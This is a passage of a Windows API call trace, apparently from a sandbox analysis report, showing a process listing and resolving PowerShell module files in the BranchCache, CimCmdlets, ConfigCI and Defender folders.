ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26be2b07, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1401f1d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x1401f1d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26bf2ff4, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26bf2ff4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26bf2ff4, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26bf2ff4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26bf2ff4, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26bf2ff4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0263.165] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26bf2ff4, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26bf2ff4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0263.166] FindNextFileW (in: hFindFile=0x1acc75d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26bf2ff4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26bf2ff4, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x26bf2ff4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 0 [0263.166] FindClose (in: hFindFile=0x1acc75d0 | out: hFindFile=0x1acc75d0) returned 1 [0263.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.167] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1")) returned 0x20 [0263.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0263.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f [0263.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0263.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f [0263.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.171] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23dbb48 | out: lpFileInformation=0x23dbb48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26be2b07, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdb2d54f1, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x26be2b07, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x6cb)) returned 1 [0263.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.171] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0263.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0263.171] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7810 [0263.171] FindNextFileW (in: hFindFile=0x1acc7810, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.172] FindNextFileW (in: hFindFile=0x1acc7810, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359ed026, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf747fb77, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x359ed026, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0263.172] FindNextFileW (in: hFindFile=0x1acc7810, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359ed026, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf747fb77, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x359ed026, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 0 [0263.172] FindClose (in: hFindFile=0x1acc7810 | out: hFindFile=0x1acc7810) returned 1 [0263.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.172] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0263.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0263.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0263.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0263.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0263.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.173] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23dc290 | out: lpFileInformation=0x23dc290*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359ed026, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdd39d840, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x359ed026, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x760)) returned 1 [0263.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0263.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", nBufferLength=0x3c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI", lpFilePart=0x0) returned 0x3b [0263.174] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\configci\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc70f0 [0263.174] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.174] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26c659cb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf74a5c5e, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x26c659cb, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x337, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConfigCI.psd1", cAlternateFileName="")) returned 1 [0263.174] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x6d90540, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x6d90540, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0263.174] FindNextFileW (in: hFindFile=0x1acc70f0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0263.175] FindClose (in: hFindFile=0x1acc70f0 | out: hFindFile=0x1acc70f0) returned 1 [0263.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.175] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\configci\\configci.psd1")) returned 0x20 [0263.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", lpFilePart=0x0) returned 0x49 [0263.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", lpFilePart=0x0) returned 0x49 [0263.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.177] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\configci\\configci.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23dcb50 | out: lpFileInformation=0x23dcb50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26c659cb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x3cdaa881, ftLastAccessTime.dwHighDateTime=0x1d94216, ftLastWriteTime.dwLowDateTime=0x26c659cb, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x337)) returned 1 [0263.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0263.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x3c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0263.178] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xbe00174, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7990 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xbe00174, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf74a5c5e, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x37b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xf992, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3ce6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3cd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x396e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3966, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3889, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0263.180] FindNextFileW (in: hFindFile=0x1acc7990, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3889, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 0 [0263.181] FindClose (in: hFindFile=0x1acc7990 | out: hFindFile=0x1acc7990) returned 1 [0263.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.182] GetFileAttributesW 